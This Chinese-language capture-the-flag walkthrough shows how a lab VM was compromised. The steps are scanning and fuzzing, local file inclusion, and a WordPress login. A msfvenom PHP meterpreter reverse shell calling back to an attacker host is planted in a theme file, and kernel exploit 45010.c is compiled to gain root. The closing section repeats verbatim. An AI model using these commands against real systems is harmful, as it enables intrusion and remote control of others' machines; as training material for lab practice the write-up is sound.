文章目录
实验目的:掌握渗透测试基本流程和渗透工具
涉及渗透工具知识点:
-
dirb 扫描web路径
-
fuzz获取url正确参数名
-
msf漏洞检索和利用
-
WordPress上传文件漏洞,反弹
已知渗透信息:
靶机安装在vmvare虚拟机中,使用NAT模式,网段192.168.31.0/24中
攻击主机:kali linux主机
渗透目的:
- 进入系统,获取靶机flag
1.主机发现,确定攻击目标
nmap方式(也可用命令行)得到主机ip:192.168.31.100,真实渗透环境肯定扫描出多个主机,需要收集多种渗透信息,分别
2.端口发现,寻找突破口
#对全端口扫描
nmap -p 1-65535 -T4 -A -v 192.168.31.100
3.web渗透
根据扫描出的服务,从易入侵的web服务开始继续渗透
遇到web有什么渗透思路:
- 目录扫描
- 请求参数fuzz
- 尝试访问敏感文件robots.txt
- 用户名和密码爆破
- 看网页源码(看有没有信息可利用)
在信息安全领域中,Fuzzing(模糊测试)是一种常用的黑盒测试技术,也是信息收集的一种方法之一。Fuzzing通过向目标系统输入大量随机数据来测试系统的鲁棒性和安全性。Fuzz测试通常涉及构建一个能够生成大量随机数据的程序,然后将这些数据发送到目标系统或应用程序中,以发现潜在的漏洞或错误。
在信息收集中,Fuzzing通常用于测试网络服务或应用程序的漏洞和弱点。通过向目标服务器发送各种类型的随机数据,可以发现一些潜在的漏洞和安全问题,例如缓冲区溢出、拒绝服务攻击、SQL注入等。Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。
总之,Fuzzing是一种非常有用的信息收集技术,可以帮助安全专业人员发现潜在的安全问题和漏洞。但需要注意的是,Fuzzing可能会导致目标系统崩溃或不稳定,因此在实施Fuzzing时需要谨慎,并遵循相关的道德和法律规范。
dirb扫描web目录
└─# dirb http://192.168.31.100/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 1 00:37:21 2023
URL_BASE: http://192.168.31.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.31.100/ ----
+ http://192.168.31.100/dev (CODE:200|SIZE:131)
+ http://192.168.31.100/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.31.100/javascript/
+ http://192.168.31.100/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.31.100/wordpress/
---- Entering directory: http://192.168.31.100/javascript/ ----
==> DIRECTORY: http://192.168.31.100/javascript/jquery/
---- Entering directory: http://192.168.31.100/wordpress/ ----
+ http://192.168.31.100/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-includes/
+ http://192.168.31.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.31.100/javascript/jquery/ ----
+ http://192.168.31.100/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/ ----
+ http://192.168.31.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/includes/
+ http://192.168.31.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/user/
---- Entering directory: http://192.168.31.100/wordpress/wp-content/ ----
+ http://192.168.31.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.31.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/network/ ----
+ http://192.168.31.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.31.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/user/ ----
+ http://192.168.31.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.31.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/plugins/ ----
+ http://192.168.31.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/themes/ ----
+ http://192.168.31.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Jul 1 00:38:39 2023
DOWNLOADED: 46120 - FOUND: 15
web内容扫描中得出,此靶机对外提供wordpress服务,通过访问url路径得到几个有用路径信息:
- http://192.168.31.100/dev (CODE:200|SIZE:131)
- ==> DIRECTORY: http://192.168.31.100/wordpress/
给出了提示:用fuzz工具和找出正确参数,接着传入参数值location.txt继续下一步
fuzz获取正确url参数
fuzz的用法:
- 找到url参数
- sql注入
- 密码暴力破解
- 绕过waf
#用参数字典访问网站,得到返回状态码、行数、字符数等统计信息,在统计信息中找出不同于其它的访问结果,拿到正确的参数
#第一遍访问获取请求返回统计信息
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.31.100/index.php?FUZZ
#第二遍访问通过参数过滤出不同与其它哪项,参数 --hw 12 从第一次访问中等到返回字数12
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.31.100/index.php?FUZZ
找到正确参数file,根据提示访问
拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。
根据提示得到关键字“follow_the_ippsec”,哪这个关键字和什么有关?目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息
WordPress漏洞利用
获取wordpress用户名
**方式一:**经验获取用户名
WordPress搭建成功后自动发布一封有用户名的文章,因此得到wordpress登录用户名为victor
尝试用账户和关键词密码发现可以登录:
接下来就针对WordPress渗透发现侵入系统的漏洞
方式二:指纹工具获取WordPress用户
关于WordPress的指纹工具
- wpscan
cmseek安装:
apt-get update
apt-get install -y cmseek
wpscan枚举WordPress用户也得到用户victor
#枚举WordPress用户完整输出
# wpscan --url http://192.168.31.100/wordpress -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.31.100/wordpress/ [192.168.31.100]
[+] Started: Sat Jul 1 01:32:10 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.31.100/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.31.100/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.31.100/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.31.100/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.31.100/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.31.100/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Jul 1 01:32:12 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 20.512 MB
[+] Memory used: 168.305 MB
[+] Elapsed time: 00:00:02
4.文件上传,反弹连接
登录进入后,如何开始WordPress渗透?
- 文件上传漏洞
生成反弹连接脚本:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=6666 -o shell.php
在wordpress中利用主题编辑功能对当前主题编辑,找到可编辑的php文件(图中如secret.php),然后粘贴上述生成的反弹连接php
在kali linux 中用msfconsole命令启动监听6666的任务
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.101
lhost => 192.168.31.101
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit
当访问
http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/secret.php (这是主题访问路径文件访问方式,记得路径就行,这是WordPress目录结构规范)
到此可以执行在目标机器上执行一部分命令,通过sysinfo命令得知系统版本时ubuntu16.04.2
5.msf提权
接下来就是提权操作,执行更多命令
提权思路:
如下演示通过msf操作系统漏洞数据库,漏洞利用获取权限
msfconsole 中执行:
searchsploit 16.04 Ubuntu
根据内核版本得到可利用的漏洞,编译漏洞利用程序:
/usr/share/exploitdb/exploits/linux/local/45010.c
并上传靶机可执行路径/tmp下,执行即可提权
在kali-linux 上编译提权程序
cp /usr/share/exploitdb/exploits/linux/local/45010.c /root
cd /root
gcc 45010.c -o 45010 # 由于gcc版本问题,编译后在靶机上执行会报错,见下面解决
msconsole中执行:
- upload上传
- shell中执行45010提权程序
执行报错:./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found (required by ./45010)
解决gcc编译版本问题:
通过反弹shell查看靶机glibc版本:
ldd --version
在kali-linux上
apt-get install -y autoconf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh
./configure
make
make check
sudo make install
PatchELF是一个简单的实用程序,用于修改现有的ELF可执行文件和库。具体而言,它可以执行以下操作:
更改可执行文件的动态加载程序(“ELF 解释器”):
$ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program更改可执行文件和库
RPATH:$ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program缩小可执行文件和库
RPATH:$ patchelf --shrink-rpath my-program
通过glibc-all-in-one库下载靶机对应版本gcc编译环境:
gcc -Wl,-rpath='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64',-dynamic-linker='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-linux-x86-64.so.2' -s 45010.c -o 45010V2
重新上传并执行
不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!芭比Q!
不过使用kali linux 2021-02-08后成功提权。也验证的一个事:有时新版kali linux能用上新工具,对于旧漏洞脚本不一定兼容,准备一个低版本的kali linux也是必要。
提权效果
图中靶机ip变为192.168.31.102,因为dhcp重新分配了ip,不影响
靶机一般在root用户放置flag文件,用提权root账号就可以获取flag,打靶完成!!!
不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!芭比Q!
不过使用kali linux 2021-02-08后成功提权。也验证的一个事:有时新版kali linux能用上新工具,对于旧漏洞脚本不一定兼容,准备一个低版本的kali linux也是必要。
提权效果
图中靶机ip变为192.168.31.102,因为dhcp重新分配了ip,不影响
靶机一般在root用户放置flag文件,用提权root账号就可以获取flag,打靶完成!!!
2497
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
